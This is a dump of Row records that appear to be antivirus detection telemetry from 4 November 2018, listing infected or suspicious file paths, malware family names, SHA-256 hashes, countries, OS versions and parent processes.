  Row(detection=Row(filename='lovebeat.exe', filepath='D:\\Online Games\\Steam\\steamapps\\downloading\\354290\\LoveBeat.exe', filesize=3152000, name='TR/Patched.Ren.Gen2.#M300.#R100092'), hash='cf02df4d4f690635255a92095260651aec4ddbd92cf889f99e5320e0369b051d', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T03:24:51Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='lovebeat.exe', filepath='D:\\Online Games\\Steam\\steamapps\\downloading\\354290\\LoveBeat.exe', filesize=3152000, name='TR/Patched.Ren.Gen2.#M300.#R100092'), hash='cf02df4d4f690635255a92095260651aec4ddbd92cf889f99e5320e0369b051d', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T03:11:05Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='cfc5d617d8ce594fafd922c04d7d9075bd5d9ecfdf8c081185b461430f682bc5', metadata=Row(cmdline='\\\\\\/Embedding', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=428032, timestamp='2018-11-04T20:58:25Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='d0311c978d131ded69d61d1f141afc0eb99b6c978c7bfda575032f5b44603204', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-32.categorizing\\D0311C978D131DED69D61D1F141AFC0EB99B6C978C7BFDA575032F5B44603204', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='d0311c978d131ded69d61d1f141afc0eb99b6c978c7bfda575032f5b44603204', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T14:49:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-221336-1d6be990', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_bc556bdb\\AVSCAN-20181104-221024-04D0AAB1\\AVSCAN-20181104-221336-1D6BE990', filesize=20000, name='PUA/Linkury.Gen2.#M1.#R1'), hash='d0327891171e6689768c4d99a2d2e90f822f924a800631780e9908f7d20f5695', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T21:17:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-224629-196dfa49', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_bc556bdb\\AVSCAN-20181104-221024-04D0AAB1\\AVSCAN-20181104-224629-196DFA49', filesize=20000, name='PUA/Linkury.Gen2.#M1.#R1'), hash='d0327891171e6689768c4d99a2d2e90f822f924a800631780e9908f7d20f5695', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T21:50:39Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='акт медперсонал.exe', filepath='F:\\ОТЧЕТЫ БЛАНКИ\\акт медперсонал.exe', filesize=1664000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='d0c983396a9ca89213740d36750581c58d0e620280b356f50ed1757f131afc59', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='D:\\Distrib\\Total Commander\\Totalcmd.exe', parentsize=826916, timestamp='2018-11-04T12:44:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='акт медперсонал.exe', filepath='\\\\?\\F:\\ОТЧЕТЫ БЛАНКИ\\акт медперсонал.exe', filesize=1664000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='d0c983396a9ca89213740d36750581c58d0e620280b356f50ed1757f131afc59', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:37:18Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-143258-50b6e117', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d023303\\AVSCAN-20181104-131819-F64932D1\\AVSCAN-20181104-143258-50B6E117', filesize=20000, name='PUA/Linkury.#M1.#R1'), hash='d0fb80dc224c4d0d9db5dad3414c4cdb8b685c69825d7c88991020c38ecb718d', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T13:33:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-144150-b6b986aa', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d023303\\AVSCAN-20181104-142814-1A56BA64\\AVSCAN-20181104-144150-B6B986AA', filesize=20000, name='PUA/Linkury.#M1.#R1'), hash='d0fb80dc224c4d0d9db5dad3414c4cdb8b685c69825d7c88991020c38ecb718d', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T13:41:54Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-141930-8b526ff3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a6aeacdd\\AVSCAN-20181104-133443-34024088\\AVSCAN-20181104-141930-8B526FF3', filesize=20000, name='PUA/Linkury.#M1.#R1'), hash='d0fb80dc224c4d0d9db5dad3414c4cdb8b685c69825d7c88991020c38ecb718d', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T13:19:31Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-165353-cea4c098', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181104-151404-D70ED41C\\AVSCAN-20181104-165353-CEA4C098', filesize=20000, name='PUA/Linkury.#M1.#R1'), hash='d0fb80dc224c4d0d9db5dad3414c4cdb8b685c69825d7c88991020c38ecb718d', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T22:53:50Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-133202-93f6b43f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d023303\\AVSCAN-20181104-131819-F64932D1\\AVSCAN-20181104-133202-93F6B43F', filesize=20000, name='PUA/Linkury.#M1.#R1'), hash='d0fb80dc224c4d0d9db5dad3414c4cdb8b685c69825d7c88991020c38ecb718d', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:32:05Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-135553-d6342287', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a6aeacdd\\AVSCAN-20181104-133443-34024088\\AVSCAN-20181104-135553-D6342287', filesize=20000, name='PUA/Linkury.#M1.#R1'), hash='d0fb80dc224c4d0d9db5dad3414c4cdb8b685c69825d7c88991020c38ecb718d', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T12:55:54Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-120653-14d38d8a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28522a7f\\AVSCAN-20181104-120223-EF441C8A\\AVSCAN-20181104-120653-14D38D8A', filesize=20000, name='PUA/Linkury.#M1.#R1'), hash='d0fb80dc224c4d0d9db5dad3414c4cdb8b685c69825d7c88991020c38ecb718d', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T11:06:34Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-162040-2943283a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181104-151404-D70ED41C\\AVSCAN-20181104-162040-2943283A', filesize=20000, name='PUA/Linkury.#M1.#R1'), hash='d0fb80dc224c4d0d9db5dad3414c4cdb8b685c69825d7c88991020c38ecb718d', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T22:20:36Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-191251-935f1574', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1065741a\\AVSCAN-20181104-190059-409DD963\\AVSCAN-20181104-191251-935F1574', filesize=20000, name='PUA/Linkury.#M1.#R1'), hash='d0fb80dc224c4d0d9db5dad3414c4cdb8b685c69825d7c88991020c38ecb718d', metadata=Row(cmdline=None, country='AR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T22:11:18Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-190857-783b5f20', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1065741a\\AVSCAN-20181104-190059-409DD963\\AVSCAN-20181104-190857-783B5F20', filesize=20000, name='PUA/Linkury.#M1.#R1'), hash='d0fb80dc224c4d0d9db5dad3414c4cdb8b685c69825d7c88991020c38ecb718d', metadata=Row(cmdline=None, country='AR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T22:07:25Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-153028-e5edb35a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d023303\\AVSCAN-20181104-142814-1A56BA64\\AVSCAN-20181104-153028-E5EDB35A', filesize=20000, name='PUA/Linkury.#M1.#R1'), hash='d0fb80dc224c4d0d9db5dad3414c4cdb8b685c69825d7c88991020c38ecb718d', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T14:30:31Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-131236-b49df754', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d023303\\AVSCAN-20181104-130041-2B7A07CF\\AVSCAN-20181104-131236-B49DF754', filesize=20000, name='PUA/Linkury.#M1.#R1'), hash='d0fb80dc224c4d0d9db5dad3414c4cdb8b685c69825d7c88991020c38ecb718d', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:12:40Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-141256-6a5d50c9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d023303\\AVSCAN-20181104-130041-2B7A07CF\\AVSCAN-20181104-141256-6A5D50C9', filesize=20000, name='PUA/Linkury.#M1.#R1'), hash='d0fb80dc224c4d0d9db5dad3414c4cdb8b685c69825d7c88991020c38ecb718d', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T13:12:59Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered maret', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered maret', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='d10b64f3d6d9307bbc0c72f71da97d688d13752bb597a30c0fff8fd1a3dfd5cd', metadata=Row(cmdline='{6A408304-E527-461F-BC50-723B367FDABD} S-1-5-21-2376277972-633460711-2922603215-1000:Ich-PC\\\\\\\\Ich:Interactive:Highest[1]', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\taskeng.exe', parentsize=192000, timestamp='2018-11-04T19:24:59Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered maret', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered maret', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='d10b64f3d6d9307bbc0c72f71da97d688d13752bb597a30c0fff8fd1a3dfd5cd', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T18:16:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered maret', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered maret', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='d10b64f3d6d9307bbc0c72f71da97d688d13752bb597a30c0fff8fd1a3dfd5cd', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T22:32:19Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered maret', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered maret', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='d10b64f3d6d9307bbc0c72f71da97d688d13752bb597a30c0fff8fd1a3dfd5cd', metadata=Row(cmdline='-k netsvcs', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T11:39:09Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered maret', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered maret', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='d10b64f3d6d9307bbc0c72f71da97d688d13752bb597a30c0fff8fd1a3dfd5cd', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T21:30:54Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered maret', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered maret', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='d10b64f3d6d9307bbc0c72f71da97d688d13752bb597a30c0fff8fd1a3dfd5cd', metadata=Row(cmdline='{33BA526E-7A73-400D-A885-76294E813AFF} S-1-5-21-2376277972-633460711-2922603215-1000:Ich-PC\\\\\\\\Ich:Interactive:Highest[1]', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\taskeng.exe', parentsize=192000, timestamp='2018-11-04T16:24:59Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered maret', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered maret', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='d10b64f3d6d9307bbc0c72f71da97d688d13752bb597a30c0fff8fd1a3dfd5cd', metadata=Row(cmdline='{8930E7E4-F80B-4737-8CD5-CC87752F0EA8} S-1-5-21-2376277972-633460711-2922603215-1000:Ich-PC\\\\\\\\Ich:Interactive:Highest[1]', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\taskeng.exe', parentsize=192000, timestamp='2018-11-04T13:24:59Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered maret', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered maret', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='d10b64f3d6d9307bbc0c72f71da97d688d13752bb597a30c0fff8fd1a3dfd5cd', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T14:38:28Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered maret', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered maret', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='d10b64f3d6d9307bbc0c72f71da97d688d13752bb597a30c0fff8fd1a3dfd5cd', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T23:39:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered maret', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered maret', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='d10b64f3d6d9307bbc0c72f71da97d688d13752bb597a30c0fff8fd1a3dfd5cd', metadata=Row(cmdline='{0EDA61E0-EE0C-4933-A76B-F1788E226A9A} S-1-5-21-2376277972-633460711-2922603215-1000:Ich-PC\\\\\\\\Ich:Interactive:Highest[1]', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\taskeng.exe', parentsize=192000, timestamp='2018-11-04T20:25:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ufrii_driver_v2120_w32_sc_12.exe', filepath='H:\\ISMAIL 2018.11.4\\ISMAIL BACHA 2018\\Canon iR1133\\canon\\UFRII_Driver_V2120_W32_SC_12.exe', filesize=33280000, name='W32/Sality.AT.#M1.#R1'), hash='d11531a2035dac5df815d6d6ea48bd2db0e19a01b256a5fd60fac4cdfb0dda85', metadata=Row(cmdline=None, country='PK', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2065448, timestamp='2018-11-04T11:15:28Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ufrii_driver_v2120_w32_sc_12.exe', filepath='H:\\ISMAIL 2018.11.4\\ISMAIL BACHA 2018\\Canon iR1133\\canon\\UFRII_Driver_V2120_W32_SC_12.exe', filesize=33280000, name='W32/Chir.B.#M1.#R1'), hash='d11531a2035dac5df815d6d6ea48bd2db0e19a01b256a5fd60fac4cdfb0dda85', metadata=Row(cmdline=None, country='PK', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T10:59:51Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='d12841befd786ff23785cc83cbd3e2229244e14adad9b99c0b7545886e945c07', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-32.categorizing\\D12841BEFD786FF23785CC83CBD3E2229244E14ADAD9B99C0B7545886E945C07', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='d12841befd786ff23785cc83cbd3e2229244e14adad9b99c0b7545886e945c07', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T15:13:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='d1652185c892b5b6d06cd76d0fcd97b20713f3ab628cf34d8a3690bf4b70e4fd', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-32.categorizing\\D1652185C892B5B6D06CD76D0FCD97B20713F3AB628CF34D8A3690BF4B70E4FD', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='d1652185c892b5b6d06cd76d0fcd97b20713f3ab628cf34d8a3690bf4b70e4fd', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T15:17:45Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='instal·lar memòria del projecte segons el cte.exe', filepath='C:\\Users\\X\\Desktop\\Eze\\Eze\\Programas\\CYPE\\cypeCAD2014p\\Instal·lació en català\\Instal·lar programes solts\\Instal·lar Memòria del projecte segons el CTE.exe', filesize=1024000, name='W32/Sality.AT.#M1.#R1'), hash='d1c41c09134499740666fdfa06507e2303914015072d764ffcc5d0d87d58db36', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe7_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe7 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='AR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-04T21:29:14Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='a0046105.scr', filepath='\\\\?\\G:\\System Volume Information\\_restore{D118A09B-90A9-4727-BFBE-3C953AC13555}\\RP31\\A0046105.scr', filesize=512000, name='TR/Patched.Gen.#M300.#R3367'), hash='d24f70d89182f9fe3c31a8cd1bf512843cc26b0a5452d1b3137c0d97b52f18c3', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T20:35:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='a0027066.exe', filepath='D:\\System Volume Information\\_restore{0BEE0DD9-7CB5-4D18-97A2-E6F2B2544E0C}\\RP27\\A0027066.EXE', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='d2a7aaffbf9078ad6e938c12231c7c827d761eb22fd78a5268ea6dc1050f5bd8', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:46:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-180631-d5329d01', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_56c5e92d\\AVSCAN-20181104-180531-CC619DD1\\AVSCAN-20181104-180631-D5329D01', filesize=64000, name='HEUR/Macro.Downloader.APG.Gen.#M1.#R1'), hash='d2dfaf5e1e361b7342648856ed044041922531acda1b0dd969527582742d3b6a', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T20:06:35Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='edital intimação levant. de penhora.doc', filepath='E:\\arquivos do cartório\\MEUS DOCUMENTOS\\EDITAL INTIMAÇÃO LEVANT. DE PENHORA.doc', filesize=64000, name='HEUR/Macro.Downloader.APG.Gen.#M1.#R1'), hash='d2dfaf5e1e361b7342648856ed044041922531acda1b0dd969527582742d3b6a', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-04T20:05:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='reggen.exe', filepath='C:\\Program Files\\DAEMON Tools Ultra\\RegGen.exe', filesize=2176000, name='HEUR/AGEN.1033304.#M1.#R1'), hash='d3035ca1880bf9cdf2b3c1d93358a8b399890ab7fe80d1f404c32a26d624f2dc', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T23:59:17Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='reggen.exe', filepath='C:\\Program Files\\DAEMON Tools Ultra\\RegGen.exe', filesize=2176000, name='HEUR/AGEN.1033304.#M1.#R1'), hash='d3035ca1880bf9cdf2b3c1d93358a8b399890ab7fe80d1f404c32a26d624f2dc', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T23:59:17Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='reggen.exe', filepath='C:\\Program Files\\DAEMON Tools Ultra\\RegGen.exe', filesize=2176000, name='HEUR/AGEN.1033304.#M1.#R1'), hash='d3035ca1880bf9cdf2b3c1d93358a8b399890ab7fe80d1f404c32a26d624f2dc', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T23:59:17Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='reggen.exe', filepath='C:\\Program Files\\DAEMON Tools Ultra\\RegGen.exe', filesize=2176000, name='HEUR/AGEN.1033304.#M1.#R1'), hash='d3035ca1880bf9cdf2b3c1d93358a8b399890ab7fe80d1f404c32a26d624f2dc', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T23:59:17Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='reggen.exe', filepath='C:\\Program Files\\DAEMON Tools Ultra\\RegGen.exe', filesize=2176000, name='HEUR/AGEN.1033304.#M1.#R1'), hash='d3035ca1880bf9cdf2b3c1d93358a8b399890ab7fe80d1f404c32a26d624f2dc', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T23:59:17Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='d3888b29071bb352e22633c06bdb76df35e32ff1b5f19386b7ac51711e2f7594', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-32.categorizing\\D3888B29071BB352E22633C06BDB76DF35E32FF1B5F19386B7AC51711E2F7594', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='d3888b29071bb352e22633c06bdb76df35e32ff1b5f19386b7ac51711e2f7594', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T15:31:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='d3a83824ddd62393cea8f2b51208d43938dd426e6d4ba6b47c516821ee0fe21a', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-32.categorizing\\D3A83824DDD62393CEA8F2B51208D43938DD426E6D4BA6B47C516821EE0FE21A', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='d3a83824ddd62393cea8f2b51208d43938dd426e6d4ba6b47c516821ee0fe21a', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T15:31:58Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='a0001744.exe', filepath='\\\\?\\J:\\System Volume Information\\_restore{5BEF2280-202E-4A37-AED8-0DB4E065AD64}\\RP0\\A0001744.exe', filesize=128000, name='HEUR/AGEN.1008649.#M1.#R1'), hash='d3ce884fba7a2572fc73047c3d0b7ee2b70c14a5cb523aea791cc29639e05035', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T06:45:13Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='a0001321.exe', filepath='\\\\?\\J:\\System Volume Information\\_restore{5BEF2280-202E-4A37-AED8-0DB4E065AD64}\\RP0\\A0001321.exe', filesize=128000, name='HEUR/AGEN.1008649.#M1.#R1'), hash='d3ce884fba7a2572fc73047c3d0b7ee2b70c14a5cb523aea791cc29639e05035', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T06:44:05Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='keygen[1].exe', filepath='/Volumes/My Passport Pro/Samart/DATA1_iMAC/Documents/Samart/WasuwatP/IT_Support/BRC1/Driver Genius Pro v8.0.0.316/Lang.rus Key/keygen/ardv_suspicious_file(s)/keygen[1].exe', filesize=128000, name='HEUR/AGEN.1028107.#M15.#R1028107'), hash='d3fc50040071f41f3e5754c1745ac786b7ebb78b83e9ed08642630666e86cee4', metadata=Row(cmdline=None, country='TH', os_name='MacOS', os_vmajor='18', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T18:02:59Z'), dt=datetime.date(2018, 11, 4)),
